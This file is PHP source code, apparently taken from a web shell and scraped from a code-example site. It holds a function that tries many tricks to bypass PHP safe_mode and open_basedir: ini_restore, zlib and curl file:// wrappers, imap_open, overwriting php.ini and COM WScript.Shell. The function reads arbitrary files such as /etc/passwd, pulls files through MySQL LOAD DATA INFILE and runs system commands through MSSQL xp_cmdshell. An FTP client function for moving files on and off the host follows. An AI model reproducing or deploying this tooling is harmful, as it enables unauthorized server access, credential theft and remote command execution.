function safemodE()
{
    global $windows, $t, $hcwd, $et;
    $file = empty($_REQUEST['file']) ? '/etc/passwd' : $_REQUEST['file'];
    $pr = "\r\n</font><font color=green>Method ";
    $po = ")</font><font color=blue>\r\n";
    $i = 1;
    if (!empty($_REQUEST['read'])) {
        echo "<pre>{$pr}{$i}:(ini_restore{$po}";
        ini_restore('safe_mode');
        ini_restore('open_basedir');
        readfile($file);
        $i++;
        echo "{$pr}{$i}:(include{$po}";
        include $file;
        $i++;
        echo "{$pr}{$i}:(copy{$po}";
        $tmp = tempnam('', 'cx');
        copy('compress.zlib://' . $file, $tmp);
        $fh = fopen($tmp, 'r');
        $data = fread($fh, filesize($tmp));
        fclose($fh);
        echo $data;
        $i++;
        if (function_exists('mb_send_mail')) {
            echo "{$pr}{$i}:(mb_send_mail{$po}";
            if (file_exists('/tmp/mb_send_mail')) {
                unlink('/tmp/mb_send_mail');
            }
            mb_send_mail(NULL, NULL, NULL, NULL, '-C $file -X /tmp/mb_send_mail');
            readfile('/tmp/mb_send_mail');
            $i++;
        }
        if (function_exists('curl_init')) {
            echo "{$pr}{$i}:(curl_init [A]{$po}";
            $fh = curl_init('file://' . $file . '');
            $tmp = curl_exec($fh);
            echo $tmp;
            $i++;
            echo "{$pr}{$i}:(curl_init [B]{$po}";
            $i++;
            if (strstr($file, DIRECTORY_SEPARATOR)) {
                $ch = curl_init('file:///' . $file . "/../../../../../../../../../../../../" . __FILE__);
            } else {
                $ch = curl_init('file://' . $file . "" . __FILE__);
            }
            var_dump(curl_exec($ch));
        }
        if (is_writable('.')) {
            echo "{$pr}{$i}:(php.ini{$po}";
            file_put_contents('php.ini', 'safe_mode = Off');
            readfile($file);
            unlink('php.ini');
            $i++;
        }
        if (is_object($ws = new COM('WScript.Shell'))) {
            echo "{$pr}{$i}:(COM{$po}";
            echo $exec = comshelL("type \"{$file}\"", $ws);
            $i++;
        }
        if (checkfunctioN('win_shell_execute')) {
            echo "{$pr}{$i}:(win32std{$po}";
            echo winshelL("type \"{$file}\"");
            $i++;
        }
        if (checkfunctioN('win32_create_service')) {
            echo "{$pr}{$i}:(win32service{$po}";
            echo srvshelL("type \"{$file}\"");
            $i++;
        }
        if (function_exists('imap_open')) {
            echo "{$pr}{$i}:(imap [A]{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $list = imap_list($str, $file, '*');
            for ($i = 0; $i < count($list); $i++) {
                echo $list[$i] . "\n";
            }
            imap_close($str);
            $i++;
            echo "{$pr}{$i}:(imap [B]{$po}";
            $str = imap_open($file, '', '');
            $tmp = imap_body($str, 1);
            echo $tmp;
            imap_close($str);
            $i++;
        }
        if ($file == '/etc/passwd') {
            echo "{$pr}{$i}:(posix{$po}";
            for ($uid = 0; $uid < 99999; $uid++) {
                $h = posix_getpwuid($uid);
                if (!empty($h)) {
                    foreach ($h as $v) {
                        echo "{$v}:";
                    }
                }
                echo "\r\n";
            }
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['show'])) {
        echo "<pre>{$pr}{$i}:(glob{$po}";
        $con = glob("{$file}*");
        foreach ($con as $v) {
            echo "{$v}\n";
        }
        $i++;
        if (function_exists('imap_open')) {
            echo "{$pr}{$i}:(imap{$po}";
            $str = imap_open('/etc/passwd', '', '');
            $s = explode("|", $file);
            if (count($s) > 1) {
                $list = imap_list($str, trim($s[0]), trim($s[1]));
            } else {
                $list = imap_list($str, trim($str[0]), '*');
            }
            for ($i = 0; $i < count($list); $i++) {
                echo "{$list[$i]}\r\n";
            }
            imap_close($str);
            $i++;
        }
        if (is_object($ws = new COM('WScript.Shell'))) {
            echo "{$pr}{$i}:(COM{$po}";
            $exec = comshelL("dir \"{$file}\"", $ws);
            $exec = str_replace("\t", '', $exec);
            echo $exec;
            $i++;
        }
        if (checkfunctioN('win_shell_execute')) {
            echo "{$pr}{$i}:(win32std{$po}";
            echo winshelL("dir \"{$file}\"");
            $i++;
        }
        if (checkfunctioN('win32_create_service')) {
            echo "{$pr}{$i}:(win32service{$po}";
            echo srvshelL("dir \"{$file}\"");
            $i++;
        }
        echo "\n</pre></font>";
    } elseif (!empty($_REQUEST['sql'])) {
        $ta = uniqid('N');
        $s = array("CREATE TEMPORARY TABLE {$ta} (file LONGBLOB)", "LOAD DATA INFILE '" . addslashes($_REQUEST['file']) . "' INTO TABLE {$ta}", "SELECT * FROM {$ta}");
        $l = mysql_connect('localhost', $_REQUEST['user'], $_REQUEST['pass']);
        mysql_select_db($_REQUEST['db'], $l);
        echo '<pre><font color=blue>';
        foreach ($s as $v) {
            $q = mysql_query($v, $l);
            while ($d = mysql_fetch_row($q)) {
                echo htmlspecialchars($d[0]);
            }
        }
        echo '</pre></font>';
    } elseif (!empty($_REQUEST['serveR']) && !empty($_REQUEST['coM']) && !empty($_REQUEST['dB']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS'])) {
        $res = '';
        $tb = uniqid('NJ');
        $db = mssql_connect($_REQUEST['serveR'], $_REQUEST['useR'], $_REQUEST['pasS']);
        mssql_select_db($_REQUEST['dB'], $db);
        mssql_query("create table {$tb} ( string VARCHAR (500) NULL)", $db);
        mssql_query("insert into {$tb} EXEC master.dbo.xp_cmdshell '" . $_REQUEST['coM'] . "'", $db);
        $re = mssql_query("select * from {$tb}", $db);
        while ($row = mssql_fetch_row($re)) {
            $res .= $row[0] . "\r\n";
        }
        mssql_query("drop table {$tb}", $db);
        mssql_close($db);
        echo "<center><textarea rows='18' cols='64'>{$res}</textarea></center><br>";
    }
    $f = !empty($_REQUEST['file']) ? htmlspecialchars($_REQUEST['file']) : '/etc/passwd';
    $u = !empty($_REQUEST['user']) ? htmlspecialchars($_REQUEST['user']) : 'cbfteam';
    $p = !empty($_REQUEST['pass']) ? htmlspecialchars($_REQUEST['pass']) : '123456';
    $d = !empty($_REQUEST['db']) ? htmlspecialchars($_REQUEST['db']) : 'test';
    echo "<center>{$t}Use PHP Bugs:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td bgcolor='#808080'></td><td bgcolor='#808080' align=right>{$hcwd}<input class=buttons type=submit name=read value='Read File'><input class=buttons type=submit name=show value='Show directory'></form>{$et}<br>{$t}Use MySQL:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>File:</td><td bgcolor='#666666'><input type=text value='{$f}' name=file size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=user value='{$u}'></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pass value='{$p}'></td></tr><tr><td width='20%' bgcolor='#808080'>Database:</td><td bgcolor='#808080'><input type=text name=db value='{$d}'></td></tr><tr><td bgcolor='#666666'></td><td bgcolor='#666666' align=right>{$hcwd}<input class=buttons type=submit name=sql value='Read'></form>{$et}<br>{$t}MSSQL Exec:</td><td bgcolor='#333333'></td></tr><form method='POST'><tr><td width='20%' bgcolor='#666666'>Server:</td><td bgcolor='#666666'><input type=text value='";
    if (!empty($_REQUEST['serveR'])) {
        echo htmlspecialchars($_REQUEST['serveR']);
    } else {
        echo 'localhost';
    }
    echo "' name=serveR size=35></td></tr><tr><td width='20%' bgcolor='#808080'>Username:</td><td bgcolor='#808080'><input type=text name=useR value='";
    if (!empty($_REQUEST['useR'])) {
        echo htmlspecialchars($_REQUEST['useR']);
    } else {
        echo 'sa';
    }
    echo "' size=35></td></tr><tr><td width='20%' bgcolor='#666666'>Password:</td><td bgcolor='#666666'><input type=text name=pasS value='";
    if (!empty($_REQUEST['pasS'])) {
        echo htmlspecialchars($_REQUEST['pasS']);
    }
    echo "' size=35></td></tr><td width='20%' bgcolor='#808080'>Command:</td><td bgcolor='#808080'><input type=text name=coM value='";
    if (!empty($_REQUEST['coM'])) {
        echo htmlspecialchars($_REQUEST['coM']);
    } else {
        echo 'dir c:';
    }
    echo "' size=35></td></tr><tr><td bgcolor='#666666'>Database:</td><td bgcolor='#666666'><input type=text name=dB value='";
    if (isset($_REQUEST['dB'])) {
        echo htmlspecialchars($_REQUEST['dB']);
    } else {
        echo 'master';
    }
    echo "'>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{$hcwd}<input class=buttons type=submit value='Execute'></form>{$et}</center>";
}
Beispiel #2
0
function ftpclienT()
{
    global $cwd, $hcwd;
    if (!empty($_REQUEST['hosT']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && checkfunctioN('ftp_connect')) {
        $user = $_REQUEST['useR'];
        $pass = $_REQUEST['pasS'];
        $host = $_REQUEST['hosT'];
        $con = ftp_connect($_REQUEST['hosT'], 21, 10);
        if ($con) {
            if (ftp_login($con, $user, $pass)) {
                if (!empty($_REQUEST['PWD'])) {
                    ftp_chdir($con, $_REQUEST['PWD']);
                }
                if (!empty($_REQUEST['filE'])) {
                    $file = $_REQUEST['filE'];
                    $mode = isset($_REQUEST['modE']) ? FTP_BINARY : FTP_ASCII;
                    if (isset($_REQUEST['geT'])) {
                        ftp_get($con, $file, $file, $mode);
                    } elseif (isset($_REQUEST['puT'])) {
                        ftp_put($con, $file, $file, $mode);
                    } elseif (isset($_REQUEST['rM'])) {
                        ftp_rmdir($con, $file);
                        ftp_delete($con, $file);
                    } elseif (isset($_REQUEST['mD'])) {
                        ftp_mkdir($con, $file);
                    }
                }
                $pwd = ftp_pwd($con);
                $dir = ftp_rawlist($con, '-la .');
                $d = opendir($cwd);
                echo "<table border=0 cellspacing=0 cellpadding=0><tr><th>{$host}</th><th>";
                if (!empty($_SERVER['SERVER_ADDR'])) {
                    echo $_SERVER['SERVER_ADDR'];
                } else {
                    echo '127.0.0.1';
                }
                echo "</th></tr><form method=POST><tr><td><input type=text value='{$pwd}' name=PWD size=50><input value=Change class=buttons type=submit></td><td><input size=50 type=text value='{$cwd}' name=workingdiR><input value=Change class=buttons type=submit></td></tr><tr><td>";
                foreach ($dir as $n) {
                    echo "{$n}<br />";
                }
                echo "</td><td>";
                while ($cdir = readdir($d)) {
                    if ($cdir != '.' && $cdir != '..') {
                        echo "{$cdir}<br>";
                    }
                }
                echo "</td></tr><tr><td colspan=2>Name:<input type=text name=filE><input type=checkbox style='border-width:1px;background-color:#333333;' name=modE value=1>Binary <input type=submit name=geT class=buttons value=Get><input type=submit name=puT class=buttons value=Put><input type=submit name=rM class=buttons value=Remove><input type=submit name=mD class=buttons value='Make dir'></td><td><input type=hidden value='{$user}' name=useR><input type=hidden value='{$pass}' name=pasS><input type=hidden value='{$host}' name=hosT></form></tr></td></table>";
            } else {
                echo "Wrong username or password!";
            }
        } else {
            echo "Can not connect to server!";
        }
    } else {
        echo '
<form name=client method="POST">
<div class="fieldwrapper">
<label class="styled" style="width:320px">FTP client</label>
</div><div class="fieldwrapper">
<label class="styled">Server:</label>
<div class="thefield">
<input type="text" name="hosT" value="localhost" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Username:</label>
<div class="thefield">
<input type="text" name="useR" value="anonymous" size="30" />
</div>
</div><div class="fieldwrapper">
<label class="styled">Password:</label>
<div class="thefield">
<input type="text" name="pasS" value="*****@*****.**" size="30" />
</div>
</div>
' . $hcwd . '
<div class="buttonsdiv">
<input type="submit" value="Connect" style="margin-left: 150px;" />
</div></form>';
    }
}